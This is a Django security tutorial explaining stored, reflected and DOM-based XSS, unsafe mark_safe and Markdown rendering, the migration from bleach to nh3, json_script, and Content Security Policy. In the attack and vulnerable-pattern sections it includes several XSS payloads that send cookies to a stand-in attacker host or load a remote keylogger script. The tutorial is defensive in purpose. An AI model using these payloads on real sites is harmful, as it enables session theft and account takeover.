Cross-Site Scripting (XSS): Stored, Reflected and DOM-Based Attacks — and Why mark_safe and Unsafe Markdown Are Equally Dangerous

Django Security Series — Post 2 | Series I: Injection Attacks

OWASP A03:2021 — Injection | Reading time: ~22 min

Post 1 of this series covered SQL Injection — an attack that targets your database by breaking the boundary between SQL structure and data. Post 2 moves up the stack to the browser layer: Cross-Site Scripting (XSS), where the boundary being broken is between HTML structure and user-supplied content. Both attacks share the same root cause — treating untrusted input as trusted code — and both are grouped under OWASP A03:2021 Injection for exactly that reason.



Django's template engine auto-escapes HTML by default, which stops the majority of XSS attacks transparently. But auto-escaping has deliberate escape hatches: mark_safe(), the | safe filter, and {% autoescape off %} blocks. Used carelessly — or applied to content that has already passed through a Markdown renderer — any of these opens an XSS vector that auto-escaping was designed to prevent. The risk is compounded by the common pattern of rendering user-submitted Markdown: the Markdown converter itself passes raw HTML through unchanged, which means calling mark_safe() on its output without sanitising first hands the attacker direct code execution in your readers' browsers.

There is also a library deprecation that every Django project rendering Markdown should act on. bleach, the most widely used HTML sanitisation library in the Python ecosystem, was deprecated by Mozilla in January 2023. It still works — version 6.x is the final release — but it no longer receives security patches and has a known gap: it does not strip javascript: URIs from allowed attributes like href without a custom callback. The actively maintained replacement is nh3, a Python binding for the Rust-based Ammonia sanitiser, which strips unsafe URL schemes by default.

In this post, we're going to break down how XSS actually works, where Django's default protections fall short, and how to set up a Markdown pipeline that won't blow up in your face when a user decides to get creative with a <script> tag.

The Attack: What It Is and How It Works

Cross-Site Scripting occurs when an application includes untrusted data in a web page without proper output encoding — allowing an attacker to execute scripts in a victim's browser in the context of the application's origin. The browser cannot distinguish between scripts the developer intended and scripts the attacker injected: both arrive in the same HTML document, from the same domain, with access to the same cookies, DOM, and storage.

The name 'Cross-Site Scripting' is basically a historical artifact at this point. In reality, it just means an attacker has found a way to run their own code inside your users' browsers. A successful XSS attack gives the attacker the same DOM access that your own JavaScript has: it can read session cookies, capture keystrokes, make authenticated API requests on behalf of the victim, redirect to a phishing page, or mine cryptocurrency in the background.

Let's describe the three most common XSS attacks:

Stored XSS

Stored XSS is the worst-case scenario: the payload is written into the application's data store — a comment, a profile bio, a product review, a forum post — and from that moment on, it executes in every visitor's browser without any further action from the attacker. One submission, unlimited victims. The attacker doesn't need to keep sending phishing links or tricking users into clicking anything; they just wait while the application does the work for them.

The forensics are also unpleasant. The malicious content is served from the application's own origin via normal HTTP responses, so server logs just show ordinary page loads. The victim's browser has no reason to raise an alarm — the script comes from a trusted domain. Django's default SESSION_COOKIE_HTTPONLY = True does block document.cookie from leaking the session cookie itself, which shuts the most obvious exfiltration path — but XSS can still read CSRF tokens out of the DOM, perform authenticated actions in-page, log keystrokes, or rewrite the UI, so HttpOnly is a partial mitigation, not a fix.

Concrete example: a comment field that stores and renders user input without sanitisation. An attacker submits the comment body <script>document.location='https://attacker.example/steal?c='+document.cookie</script>. The comment is saved to the database. Every subsequent visitor who loads the page executes that script in their browser: any token the script can reach is exfiltrated to the attacker's server, and they never see anything unusual — the script runs silently in the background. The attacker submitted the payload once; every future page load is an automatic re-execution.

Reflected XSS

With Reflected XSS, the payload travels in the URL or form submission, gets echoed back in the server's response, and vanishes — it's never written to disk. This makes it sound less dangerous than Stored, but the delivery problem is usually easier to solve than it looks. The crafted link can be buried inside a phishing email from a spoofed sender, shrunk by a URL shortener, embedded in a QR code, or slipped into a chat message. Once the victim clicks it, the payload runs in the context of the legitimate site, with the same DOM access your own JavaScript has.

From a detection standpoint, it's nearly invisible: the server's access log records one perfectly ordinary page request, and nothing is left behind after the response is sent.

Concrete example: a search view that echoes the query term back into the page with <p>No results for: {{ query }}</p>. If query is rendered with | safe or the view passes it through mark_safe(), an attacker can craft a URL such as https://example.com/search/?q=<script>fetch('https://attacker.example/?c='+document.cookie)</script> and distribute it via a phishing email. Any user who clicks the link executes the payload in the context of the legitimate site — with full access to that site's cookies and DOM — even though nothing malicious is stored on the server.
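As a rough illustration of the search example, the sketch below uses only the Python standard library (not Django itself) to show the same crafted link rendered with and without escaping. The names render_no_results, trust_input and CRAFTED_URL are hypothetical, introduced only for this demonstration.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Percent-encoded form of ?q=<script>alert(1)</script>, as it would travel in a link.
CRAFTED_URL = "https://example.com/search/?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"


def render_no_results(url: str, trust_input: bool = False) -> str:
    """Echo the q parameter back into a fragment of HTML.

    trust_input=True mimics '| safe' / mark_safe(): the value is inserted as-is.
    trust_input=False mimics default auto-escaping.
    """
    # parse_qs decodes the percent-encoding, so the server sees the raw payload.
    query = parse_qs(urlsplit(url).query).get("q", [""])[0]
    shown = query if trust_input else escape(query)
    return f"<p>No results for: {shown}</p>"


if __name__ == "__main__":
    print(render_no_results(CRAFTED_URL, trust_input=True))   # payload arrives as markup
    print(render_no_results(CRAFTED_URL, trust_input=False))  # payload arrives as text
```

In a real Django template the escaped branch is what {{ query }} does by default; the unescaped branch corresponds to | safe or mark_safe().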

DOM-Based XSS

DOM-Based XSS doesn't touch the server at all. The vulnerability is in client-side JavaScript that reads from a source the attacker controls — location.hash, document.referrer, URLSearchParams — and writes that value into a dangerous sink like innerHTML, document.write, or eval. Django's template engine is completely out of the picture; the server's response can be perfectly clean and the attack still works.

This is what makes it especially tricky: WAFs, server-side validation, and HTTP-level scanning tools are all blind to it. The only place the vulnerability exists is in the JavaScript code itself. The fix is usually simple in principle — use innerText or textContent instead of innerHTML when inserting untrusted text into the DOM, and stay away from eval and new Function(string) with anything that came from the URL — but it requires knowing where in your JavaScript those dangerous patterns exist.

It's worth being explicit about why Django can't help here: browsers never send the fragment (#...) to the server as part of the HTTP request. Django literally never sees it. No middleware, template filter, or view can inspect or sanitise a value that only exists in the browser. The only server-side lever Django has is the Content-Security-Policy header (covered later in this post), which acts as a backstop by restricting what scripts the browser is allowed to execute. A newer complement is Trusted Types (require-trusted-types-for 'script'), a CSP directive that forces every DOM write through a typed JavaScript policy: passing a raw string to innerHTML throws a TypeError at runtime and, with CSP reporting configured, fires off a violation report. Django can deliver that header via django-csp, but writing the Trusted Types policy itself is still JavaScript work.

Concrete example: a page reads a fragment identifier to pre-fill a UI element with document.getElementById('welcome').innerHTML = decodeURIComponent(location.hash.slice(1)). An attacker distributes the URL https://example.com/dashboard/#<img src=x onerror=fetch('https://attacker.example/?c='+document.cookie)>. The server returns its normal, unmodified response — there is nothing suspicious in the HTTP traffic. The browser then executes the JavaScript, reads the fragment, writes it into innerHTML, and the injected onerror handler fires. Django's template layer is never involved.

How Attackers Exploit It

The canonical demonstration payload is <script>alert(1)</script>, but real attacks use more capable ones — and their capabilities are the same across all three variants; only the delivery route changes:

| Payload pattern | What it does |
|---|---|
| <script>document.location='https://attacker.example/?c='+document.cookie</script> | Exfiltrates session cookies |
| <img src=x onerror="fetch('/api/action',{method:'POST',credentials:'include'})"> | Performs an authenticated action as the victim |
| <script src="https://attacker.example/keylogger.js"></script> | Loads a remote payload for persistence |

HTML attributes provide injection points when <script> tags are stripped but event handlers are not: <img src=x onerror=...>, <svg onload=...>, <body onpageshow=...>. In Markdown specifically, link targets are a critical vector: [click me](javascript:alert(document.cookie)) renders as <a href="javascript:alert(document.cookie)">click me</a> — valid Markdown, valid XSS, and one that bleach does not stop without extra configuration.

MITRE ATT&CK maps the credential harvesting consequence to T1056.003 (Input Capture: Web Portal Capture) and the initial code execution to T1059.007 (Command and Scripting Interpreter: JavaScript).

Real-World Incidents

TweetDeck XSS Worm (2014)

In June 2014, an Austrian teenager (handle @firoxl) was experimenting with TweetDeck — Twitter's official power-user dashboard — trying to make it display a unicode heart character. In the process he discovered that TweetDeck was rendering tweet content as raw, unsanitised HTML inside its column interface. He reported the vulnerability to Twitter shortly after, but the issue was already in the wild — within hours, another user created a self-replicating worm using the same flaw: a single tweet containing a <script> tag that automatically retweeted itself from the account of every TweetDeck user who loaded it in their timeline. At publication time in The Guardian's report, the worm tweet had accumulated over 81,500 retweets. Twitter suspended the TweetDeck service entirely while engineers patched the rendering layer.

The 2014 TweetDeck incident is a textbook example of how fast Stored XSS can spiral out of control, and of how a vulnerability discovered accidentally, reported responsibly, and exploited by a third party can still cause massive harm in the gap between disclosure and patch. The formula was painfully simple: a single rendering pipeline without an HTML sanitiser, one user-generated content field, and every subsequent viewer executes whatever was stored. In MITRE ATT&CK terms, this is T1059.007 (Command and Scripting Interpreter: JavaScript). The fix was a single change to that pipeline: pass tweet content through an HTML sanitiser before inserting it into the DOM, which is exactly the nh3.clean() step this post's secure pipeline adds between markdown.markdown() and mark_safe(). For Django developers the parallel is direct: a comment field, a user bio, a product review. Any field that stores content from one user and renders it for others becomes this worm's entry point if it reaches the browser without sanitisation.

Source: The Guardian — TweetDeck vulnerability: teenager's emoji heart exposes Twitter security flaw (2014)

Django's Default Protections

Django's template engine auto-escapes all variable output by default. Auto-escaping is the process of automatically converting characters that have special meaning in HTML into their safe text equivalents before they are written into the page — so that a value like <script> is rendered as visible text rather than executed as markup. When you write {{ variable }} in a template, Django converts five characters before inserting the value into HTML:

| Character | Escaped as |
|---|---|
| < | &lt; |
| > | &gt; |
| ' | &#x27; |
| " | &quot; |
| & | &amp; |

A stored payload of <script>alert(1)</script> in a model field renders as &lt;script&gt;alert(1)&lt;/script&gt;: harmless visible text in the browser, never parsed as HTML. This happens automatically for every {{ variable }} expression, with no developer action required.
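The same five replacements can be reproduced with Python's standard html.escape, which, as far as we can tell, is what Django's own escape helper builds on in current versions. The helper name escape_table is hypothetical and exists only to make the mapping visible.

```python
from html import escape


def escape_table() -> dict[str, str]:
    """Map each of the five HTML-significant characters to its escaped form."""
    return {ch: escape(ch) for ch in ["<", ">", "'", '"', "&"]}


if __name__ == "__main__":
    for raw, escaped in escape_table().items():
        print(f"{raw}  ->  {escaped}")
    # A stored payload becomes inert text once escaped.
    print(escape("<script>alert(1)</script>"))
```

Note that & is escaped too, so a value that already contains an entity is shown literally rather than being decoded a second time.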

Auto-escaping applies regardless of where the value came from — a database model field, a URL query parameter (request.GET), a form submission (request.POST), or any other origin. The source of the data makes no difference; the template engine escapes every {{ variable }} the same way.

This protection applies to the output encoding step: the final transformation before HTML is sent to the browser. It has three limitations developers must know:

- Developer-declared bypasses: mark_safe(), the | safe filter, and {% autoescape off %} blocks disable auto-escaping entirely for the values they touch. These are covered in the next section.
- <script> blocks in templates: Django still HTML-escapes {{ variable }} expressions inside a <script> tag, but HTML escaping is the wrong encoding for a JavaScript context. It leaves backslashes, line breaks, and unquoted values untouched, and the browser does not decode entities inside a script, so a value can still break or alter the code around it. The correct strategy is JSON encoding via json_script. This is covered under Vulnerable Pattern § 5.
- DOM-Based XSS: if client-side JavaScript reads from a source the attacker controls (location.hash, URLSearchParams, document.referrer) and writes to a dangerous sink (innerHTML, document.write, eval), the attack never touches the server. Django's template escaping is not involved and offers no protection. This variant is covered in the Attack section above.

Vulnerable Pattern: What NOT to Do

1. mark_safe() on User-Supplied Content

To understand why mark_safe() is dangerous on user input, you first need to understand why it exists at all.

Django's template engine escapes every {{ variable }} by default, turning <script> into &lt;script&gt; before writing it into the page. This is correct for plain text values, but it is a problem when you legitimately need to render HTML. If a developer has already built a safe HTML string (say, a navigation menu assembled in Python code that contains <a href="..."> tags), they don't want those angle brackets escaped into visible text. mark_safe() is the developer's declaration to Django: "I have verified this string is safe HTML; render it as markup, not as text."

The entire safety guarantee rests on that declaration being true. Django does not verify it. It trusts the developer completely.

# INSECURE: marks attacker-controlled string as trusted HTML
from django.utils.safestring import mark_safe

def render_user_bio(bio_text):
    return mark_safe(bio_text)  # auto-escaping is now permanently disabled for this value

When mark_safe() is called on a value from user input, the developer is telling Django to trust content they did not write and cannot control. Auto-escaping — which would have turned <script>alert(1)</script> into harmless visible text — is bypassed entirely. The template outputs the raw string into the page, the browser parses it as HTML, and the script executes. Every visitor who loads that page runs the attacker's code in their browser, in the context of your domain, with access to your session cookies and DOM.

The rule is unconditional: never pass a value that originated from user input to mark_safe() without first running it through an allowlist sanitiser.
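To make the "declaration of trust" concrete, here is a toy model of the mechanism written with the standard library only. It is not Django's implementation: TrustedHTML, mark_trusted and render are hypothetical names, and the only assumption borrowed from Django is the general idea that a renderer skips escaping for strings carrying a trust marker.

```python
from html import escape


class TrustedHTML(str):
    """Toy stand-in for a 'safe' string: a str subclass that carries a trust marker."""

    def __html__(self) -> str:
        return self


def mark_trusted(value: str) -> TrustedHTML:
    """Attach the trust marker. Nothing about the content is checked."""
    return TrustedHTML(value)


def render(value: str) -> str:
    """Escape by default; pass marked strings through untouched."""
    if hasattr(value, "__html__"):
        return str(value)
    return escape(str(value))


if __name__ == "__main__":
    payload = "<script>alert(1)</script>"
    print(render(payload))                # escaped: shown as text
    print(render(mark_trusted(payload)))  # unescaped: the marker wins, payload intact
```

The point of the sketch is that the marker is a promise made by the caller, not a property verified by the renderer.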

2. The | safe Filter and {% autoescape off %}

| safe and {% autoescape off %} solve the same problem as mark_safe(), but at the template layer instead of the view or template-tag layer. The legitimate use case is identical: a developer has produced HTML in Python code — perhaps a utility that generates pagination links, a form widget that renders its own markup, or a variable that has already been processed through a trusted sanitiser — and needs the template to render it as HTML rather than escape it as text.

Both are syntactic alternatives to mark_safe(). Applying | safe to a variable is exactly equivalent to having called mark_safe() on that value in Python — it sets the same trusted-HTML flag on the string object and bypasses auto-escaping for that output point. {% autoescape off %} is broader: it disables auto-escaping for every variable inside the block, not just one.

{{ comment.body | safe }}

{% autoescape off %}
  {{ post.user_content }}
{% endautoescape %}

The danger is the same as mark_safe(): if the value reaching these expressions contains user-supplied content, auto-escaping — the only thing standing between a stored <script> tag and the browser — is gone. {% autoescape off %} compounds the risk because a single misplaced block silently disables protection for every variable inside it, including variables added by future developers who may not notice the block is there.

3. Markdown Without Sanitisation

Markdown is used wherever applications need to accept rich text from users without exposing them to the full complexity — and full attack surface — of an HTML editor. A blog comment system, a project README field, a user bio, a product review: these all benefit from letting users write **bold** or [a link](https://example.com) without needing to type raw HTML. The server converts that Markdown syntax to HTML at render time and displays it in the page. It is a widely adopted pattern precisely because it feels safe — Markdown is a lightweight markup language, not HTML, so it seems like there is a layer of separation between user input and the rendered page.

There is not. The Python markdown library — the de-facto standard converter — deliberately passes raw HTML embedded in Markdown source through to its output unchanged. A user is not limited to Markdown syntax; they can include literal <script> tags in their input and the converter will pass them straight into the HTML it produces. Then, because the application needs to render that HTML properly in the browser, it calls mark_safe() on the result — and at that point the raw <script> tag reaches the page unmodified.

# INSECURE: markdown.markdown() passes raw HTML through unchanged
import markdown
from django.utils.safestring import mark_safe

def render_user_content(text):
    html = markdown.markdown(text)
    return mark_safe(html)  # <script> in 'text' survives the markdown step intact

The library's safe_mode option was removed in version 3.0 (2018) precisely because it was not a reliable sanitisation mechanism. The maintainers' explicit position is that sanitisation belongs to a dedicated downstream library, not the converter itself. Today the library's documentation makes no claim of sanitisation, and its behaviour is unchanged: a user who submits <script>fetch('https://attacker.example/?c='+document.cookie)</script> in a Markdown body gets that script tag passed through to the HTML output intact.

4. bleach — Deprecated; Replace It

bleach was the go-to HTML sanitisation library in the Python ecosystem for over a decade. It was developed by Mozilla and used in production at scale — most notably powering the HTML sanitisation layer in the Firefox Add-ons Marketplace. Its job in a Markdown pipeline was exactly what the previous section called for: take the raw HTML output from markdown.markdown(), strip every tag and attribute not on an explicit allowlist, and return clean HTML that was safe to pass to mark_safe(). For years, if you searched for "Django sanitise HTML" or "Python bleach Markdown", the bleach pattern was the standard answer.

Mozilla deprecated bleach on 2023-01-23. The final release is 6.x. It still works as a Python package, but it no longer receives security patches. The deprecation notice links directly to nh3 as the recommended replacement.

Beyond the deprecation, bleach has a structural gap that makes it insufficient even at 6.x: it does not inspect the content of allowed attribute values. href is a legitimate attribute on <a> tags and belongs in any allowlist. But bleach does not validate what the href contains — so <a href="javascript:alert(document.cookie)"> passes through bleach.clean() unchanged when href is allowed. The [click me](javascript:alert(1)) Markdown pattern is valid input, produces that <a> tag after the Markdown step, and reaches the browser as a live XSS vector.

If your codebase uses bleach, migrate to nh3. Do not add bleach to new projects.

Bleach is still present in a large number of production Django codebases written before 2023. If you encounter it in an existing project, you need to recognise the pattern, understand exactly where its gap is, and know what to replace it with.

# PARTIALLY INSECURE: bleach strips <script> but not javascript: hrefs by default
import bleach

ALLOWED_TAGS = ['a', 'p', 'strong']  # ... full tag list
ALLOWED_ATTRS = {'a': ['href', 'title']}

# 'html' is the output of markdown.markdown() from the previous step
clean = bleach.clean(html, tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRS, strip=True)
# A link like <a href="javascript:alert(1)">text</a> survives this call intact

The secure replacement is nh3 (covered in the next section). It wraps the Rust Ammonia library, which applies a URL scheme allowlist to every URL-type attribute by default — javascript: and data: URIs are stripped without any extra configuration. The migration is a small API change: swap import bleach for import nh3, change list literals to set literals for the tags and attributes parameters, and drop the strip=True argument (Ammonia always strips). Remove bleach and webencodings from requirements.txt and add nh3.

5. JavaScript Context: <script> Blocks

Django's auto-escaping is an HTML-context escape: it converts the five characters that break HTML structure. It still runs on {{ variable }} expressions inside a <script> block, but within JavaScript, HTML escaping is the wrong encoding entirely: it can corrupt legitimate values and leaves JavaScript-significant characters untouched, so it produces broken code rather than safe code.

A common pattern that looks safe but is not:

<script>
  var username = "{{ request.user.username }}";
</script>

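Django escapes the quote characters here, so a value such as "; fetch('https://attacker.example/?c='+document.cookie);// cannot simply close the string. That is luck, not safety. The browser does not decode HTML entities inside a <script> element, so a legitimate name like O'Brien reaches JavaScript as the literal text O&#x27;Brien. HTML escaping also ignores characters that matter to JavaScript: a value ending in a backslash escapes the closing quote and breaks the script, and in an unquoted context such as var id = {{ value }}; a payload like alert(document.cookie) contains none of the five escaped characters and executes as written.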
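A small standard-library sketch of what HTML escaping does, and does not do, to values headed for a script block. Python's html.escape stands in for the template engine's escaping here, and html_escaped is a hypothetical helper name.

```python
from html import escape


def html_escaped(value: str) -> str:
    """What an HTML-context escape emits for this value."""
    return escape(value)


if __name__ == "__main__":
    # 1. A legitimate value is altered: inside <script> the entity is never
    #    decoded, so JavaScript would see the entity text, not an apostrophe.
    print(html_escaped("O'Brien"))

    # 2. A backslash is not an HTML-significant character, so it is untouched.
    #    At the end of a quoted JS string it would escape the closing quote.
    print(html_escaped("trailing\\"))

    # 3. A payload with none of the five characters passes through unchanged.
    #    In an unquoted position it is plain JavaScript.
    print(html_escaped("alert(document.cookie)"))
```

None of these cases is a flaw in the escaping itself; it is doing its HTML job in a place where a JavaScript-aware encoding is needed.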

The correct fix is Django's built-in json_script filter, which serialises the value to a JSON-encoded <script> block using an id attribute you reference from your own JavaScript:

{{ request.user.username | json_script:"username-data" }}

<script>
  var username = JSON.parse(document.getElementById('username-data').textContent);
</script>

json_script escapes <, > and & in the JSON output as Unicode escape sequences (\u003C, \u003E, \u0026) so the value cannot break out of the <script> block, and it avoids inline string interpolation entirely: the value is passed through the DOM as a data node, never concatenated directly into JavaScript source.

The rule is: never interpolate user data directly into a <script> block with {{ variable }}. Use json_script and read the value from the DOM in your JavaScript.
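The idea behind json_script can be approximated in a few lines of standard-library Python. This is a simplified sketch, not Django's source: json_script_sketch is a hypothetical name, and the real filter also uses Django's own JSON encoder for types such as dates and decimals.

```python
import json
from html import escape

# Characters that could end the <script> element or start markup are written
# as JSON Unicode escapes, which JSON.parse decodes back to the originals.
_SCRIPT_ESCAPES = {
    ord("<"): "\\u003C",
    ord(">"): "\\u003E",
    ord("&"): "\\u0026",
}


def json_script_sketch(value, element_id: str) -> str:
    """Serialise value into an inert JSON data block with the given id."""
    payload = json.dumps(value).translate(_SCRIPT_ESCAPES)
    return (
        f'<script id="{escape(element_id)}" type="application/json">'
        f"{payload}</script>"
    )


if __name__ == "__main__":
    hostile = "</script><script>alert(1)</script>"
    print(json_script_sketch(hostile, "username-data"))
```

Because the block has type application/json, the browser treats it as data rather than code, and the only closing tag in the output is the one the function wrote itself.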

Secure Implementation: The Django Way

The safe pattern for rendering Markdown from untrusted sources is a strict two-step pipeline:

- Convert Markdown to HTML (the Markdown library's responsibility)

- Sanitise the HTML against an allowlist (the sanitiser's responsibility)

Only after both steps is it safe to call mark_safe().

The Legacy Pipeline (bleach — deprecated, no longer patched)

This pattern is common in existing Django codebases. It is shown here so you can recognise it and understand the gap before migrating to nh3.

A typical Django template tag implementing the Markdown pipeline with bleach looks like this:

import re

import bleach
import markdown as _md
from django import template
from django.utils.safestring import mark_safe

register = template.Library()

BLOG_ALLOWED_TAGS = [
    'p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'blockquote',
    'pre', 'code', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
    'a', 'img', 'table', 'thead', 'tbody', 'tr', 'th', 'td',
]

BLOG_ALLOWED_ATTRIBUTES = {
    'a': ['href', 'title', 'target', 'rel'],
    'img': ['src', 'alt', 'title', 'width', 'height'],
    'code': ['class'],
    'pre': ['class'],
}

@register.filter(name='markdown')
def markdown_filter(value):
    if not value:
        return mark_safe('')
    # Strip HTML comments before conversion
    value = re.sub(r'<!--.*?-->', '', str(value), flags=re.DOTALL)
    raw_html = _md.markdown(value, extensions=['fenced_code', 'tables', 'nl2br'])
    clean_html = bleach.clean(
        raw_html,
        tags=BLOG_ALLOWED_TAGS,
        attributes=BLOG_ALLOWED_ATTRIBUTES,
        strip=True,  # removes disallowed tags entirely rather than escaping them
    )
    return mark_safe(clean_html)

The strip=True argument removes disallowed tags from the output rather than HTML-escaping them. The gap, as noted above, is javascript: URIs in href — bleach passes them through because href is in the allowlist.

Migrating to nh3

nh3 wraps the Rust Ammonia library, which applies a URL scheme allowlist to every URL-type attribute. A conservative allowlist of safe URL schemes is applied by default — including http, https, mailto, tel, and a handful of others (see nh3.ALLOWED_URL_SCHEMES); javascript: and data: URIs are stripped with no extra configuration required. The url_schemes parameter lets you customise this set if needed.
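What a URL scheme allowlist means in practice can be sketched with the standard library. This is an illustration of the concept only, not how Ammonia implements it and not a substitute for a sanitiser: has_safe_scheme and SAFE_SCHEMES are hypothetical names, and the scheme set is a small illustrative subset rather than nh3's actual default.

```python
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https", "mailto", "tel"}  # illustrative subset

# Browsers drop tabs and newlines inside a URL and ignore leading control
# characters and spaces, so normalise the same way before inspecting the scheme.
_STRIP_INSIDE = {ord(ch): None for ch in "\t\r\n"}
_STRIP_EDGES = "".join(chr(code) for code in range(0x21))


def has_safe_scheme(url: str) -> bool:
    """Return True for relative URLs and URLs whose scheme is on the allowlist."""
    cleaned = url.translate(_STRIP_INSIDE).strip(_STRIP_EDGES)
    try:
        scheme = urlsplit(cleaned).scheme  # urlsplit lowercases the scheme
    except ValueError:
        return False  # unparseable input is rejected rather than guessed at
    return scheme == "" or scheme in SAFE_SCHEMES


if __name__ == "__main__":
    for candidate in [
        "https://example.com/",
        "/relative/path",
        "javascript:alert(1)",
        "JaVaScRiPt:alert(1)",
        "java\tscript:alert(1)",
        "data:text/html,<script>alert(1)</script>",
    ]:
        print(repr(candidate), has_safe_scheme(candidate))
```

The check operates on the already-decoded attribute value; parsing the HTML and decoding entities is the part a real sanitiser does for you.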

The API differences from bleach are minor: nh3 uses Python set objects rather than lists for tags and attributes. The pipeline logic is identical:

import re

import markdown as _md
import nh3
from django import template
from django.utils.safestring import mark_safe

register = template.Library()

BLOG_ALLOWED_TAGS = {
    'p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'blockquote',
    'pre', 'code', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
    'a', 'img', 'table', 'thead', 'tbody', 'tr', 'th', 'td',
}

BLOG_ALLOWED_ATTRIBUTES = {
    # 'rel' is deliberately not listed: Ammonia sets rel="noopener noreferrer"
    # on links itself (link_rel) and rejects an allowlist that also contains it.
    'a': {'href', 'title', 'target'},
    'img': {'src', 'alt', 'title', 'width', 'height'},
    'code': {'class'},
    'pre': {'class'},
}

@register.filter(name='markdown')
def markdown_filter(value):
    if not value:
        return mark_safe('')
    # Strip HTML comments before conversion
    value = re.sub(r'<!--.*?-->', '', str(value), flags=re.DOTALL)
    raw_html = _md.markdown(value, extensions=['fenced_code', 'tables', 'nl2br'])
    clean_html = nh3.clean(
        raw_html,
        tags=BLOG_ALLOWED_TAGS,
        attributes=BLOG_ALLOWED_ATTRIBUTES,
    )
    return mark_safe(clean_html)

nh3 does not need a strip parameter — Ammonia always removes disallowed content.

The Invariant Rule

Wherever mark_safe() appears in code that touches user-supplied content, a sanitiser call must precede it:

# ALWAYS: sanitise first, mark safe second
clean = nh3.clean(user_html, tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRS)
return mark_safe(clean)

# NEVER: mark safe without sanitising
return mark_safe(user_html)
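Applying the rule starts with knowing where mark_safe() is called. One possible way to list those call sites is a small audit helper built on the standard ast module. This is a sketch under stated assumptions: find_mark_safe_calls is a hypothetical name, it only reports line numbers, and deciding whether each call is preceded by a sanitiser is still a manual review step.

```python
import ast


def find_mark_safe_calls(source: str, filename: str = "<string>") -> list[int]:
    """Return the line numbers of every mark_safe(...) call in the source text.

    Matches both the bare name (mark_safe(x)) and attribute access
    (safestring.mark_safe(x)). The source is parsed, never imported or run.
    """
    tree = ast.parse(source, filename=filename)
    lines = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name == "mark_safe":
            lines.append(node.lineno)
    return sorted(lines)


if __name__ == "__main__":
    import pathlib
    import sys

    # Usage: python audit_mark_safe.py path/to/project
    root = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path in root.rglob("*.py"):
        try:
            hits = find_mark_safe_calls(path.read_text(encoding="utf-8"), str(path))
        except (SyntaxError, UnicodeDecodeError):
            continue  # skip files that cannot be parsed
        for lineno in hits:
            print(f"{path}:{lineno}")
```

A template-side search for | safe and {% autoescape off %} would still be needed, since those bypasses never appear in Python code.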

Content Security Policy

Sanitisation prevents malicious HTML from being stored and rendered in the first place. Content Security Policy (CSP) is the browser-level backstop that applies when sanitisation fails — a misconfiguration, an allowlist edge case, or an unforeseen bypass vector. A CSP header tells the browser which script sources it is permitted to execute; an injected <script> tag that survives sanitisation is blocked at the execution stage before it can run.

CSP is defence-in-depth, not a replacement for sanitisation. In a defence-in-depth posture, both layers belong in the design.

Setting CSP in Django

The django-csp package (maintained by Mozilla) adds a Content-Security-Policy header to every response via middleware. Since django-csp 4.0 the configuration uses a single nested dict instead of the older flat CSP_* variables:

pip install django-csp

# settings.py (django-csp 4.0+ syntax)
INSTALLED_APPS = [..., 'csp']
MIDDLEWARE = [..., 'csp.middleware.CSPMiddleware']

CONTENT_SECURITY_POLICY = {
    "DIRECTIVES": {
        "default-src": ("'none'",),
        "script-src": ("'self'",),
        "style-src": ("'self'",),
        "img-src": ("'self'", "data:"),
        "font-src": ("'self'",),
        "connect-src": ("'self'",),
        "base-uri": ("'none'",),
        "form-action": ("'self'",),
        "frame-ancestors": ("'none'",),
    },
}

The script-src: 'self' directive restricts script execution to files served from your own origin. An injected <script>alert(1)</script> (inline) and <script src="https://attacker.example/evil.js"> (external) are both blocked — the browser refuses to execute them regardless of what the HTML contains.
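For readers who have not looked at the header itself, the sketch below shows roughly how a directives mapping like the one above translates into the header value the browser receives. django-csp builds the real header for you; build_csp_header is a hypothetical helper that only illustrates the wire format.

```python
def build_csp_header(directives: dict[str, tuple[str, ...]]) -> str:
    """Join directives into a Content-Security-Policy header value.

    Each directive is 'name source source ...'; directives are separated by '; '.
    """
    return "; ".join(
        f"{name} {' '.join(sources)}" for name, sources in directives.items()
    )


if __name__ == "__main__":
    policy = {
        "default-src": ("'none'",),
        "script-src": ("'self'",),
        "img-src": ("'self'", "data:"),
    }
    print("Content-Security-Policy:", build_csp_header(policy))
```

Seeing the flattened string makes it easier to compare your settings against what the browser's developer tools report for a response.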

Key Directives

| Directive | Recommended value | What it restricts |
|---|---|---|
| default-src | 'none' | Fallback for all resource types not explicitly listed |
| script-src | 'self' | Script execution: blocks inline <script> and external script origins |
| style-src | 'self' | Stylesheet loading |
| img-src | 'self' data: | Image sources |
| base-uri | 'none' | Prevents <base> tag injection that hijacks relative URLs |
| form-action | 'self' | Prevents forms from exfiltrating data to attacker-controlled endpoints |
| frame-ancestors | 'none' | Prevents clickjacking (supersedes X-Frame-Options: DENY) |

Report-Only Mode

Before enforcing a policy in production, use Content-Security-Policy-Report-Only to audit violations without blocking anything. This is the safe way to roll out a strict policy on a live site:

# settings.py, audit phase (django-csp 4.0+)
CONTENT_SECURITY_POLICY_REPORT_ONLY = {
    "DIRECTIVES": {
        # ... same directives as CONTENT_SECURITY_POLICY ...
        "report-uri": ("/csp-report/",),
    },
}

Once all violations are resolved, replace CONTENT_SECURITY_POLICY_REPORT_ONLY with CONTENT_SECURITY_POLICY to enforce the policy.
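During the audit phase something has to receive the reports sent to /csp-report/. As far as we know django-csp does not ship that endpoint, so you would write a small view yourself. The sketch below covers only the parsing step, assuming the classic report-uri JSON body with a top-level "csp-report" key; summarise_csp_report is a hypothetical name, and the newer Reporting API (report-to) uses a different payload shape.

```python
import json


def summarise_csp_report(body: bytes) -> str:
    """Turn a report-uri style violation report into a one-line log message."""
    report = json.loads(body).get("csp-report", {})
    # Older browsers send only 'violated-directive'; newer ones add 'effective-directive'.
    directive = report.get("effective-directive") or report.get(
        "violated-directive", "unknown"
    )
    blocked = report.get("blocked-uri", "unknown")
    page = report.get("document-uri", "unknown")
    return f"{directive} blocked {blocked} on {page}"


if __name__ == "__main__":
    sample = json.dumps(
        {
            "csp-report": {
                "document-uri": "https://example.com/post/1/",
                "violated-directive": "script-src 'self'",
                "blocked-uri": "inline",
            }
        }
    ).encode()
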